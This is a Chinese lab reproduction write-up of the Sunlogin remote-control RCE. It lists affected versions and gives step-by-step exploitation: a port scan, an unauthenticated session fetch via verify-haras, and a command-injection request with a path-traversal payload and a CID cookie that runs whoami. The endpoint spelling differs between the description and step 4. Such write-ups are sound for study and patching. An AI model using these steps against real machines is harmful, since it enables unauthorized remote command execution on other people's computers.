漏洞介绍
向日葵远程控制是一款面向企业和专业人员的远程pc管理和控制的服务软件。可以在任何有网络的情况下,轻松访问并控制安装了向日葵客户端的远程主机。同时还能实现远程文件传输、远程视频监控等功能,这不仅为用户的使用带来很多便捷,还能为其提供各类保障。
Sunlogin RCE 是漏洞发生在接口/check处,当参数cmd的值以ping或者nslookup开头时可以构造命令实现远程命令执行利用,客户端开启客户端会自动随机开启一个大于40000的端口号
影响版本
向日葵个人版for Windows <= 11.0.0.33
向日葵简约版 <= V1.0.1.43315(2021.12)
测试客户端漏洞版本:11.0.0.33162
漏洞复现:
本次使用环境链接:https://pan.baidu.com/s/1g5gnZqYxV8vJ9OBpXiOL3w
提取码:c53l
1.本次使用靶机为win10 攻击机是kali 靶机打开向日葵
在kali nmap命令探测向日葵端口(40000-65535)
2.使用靶机ip+探测出来的端口去浏览器访问看返回值找到如下结果
3.探测路径http://192.168.1.9:49672/cgi-bin/rpc?action=verify-haras 未授权访问获取session会话
4.使用burp抓包http://192.168.1.9:49672/cheak?cmd=ping…/…/…/windows/system32/whoami
5.抓包结果添加一行Cookie: CID= cid为第三步返回的结果有
6.可以看到可以执行系统命令,可以做进一步操作。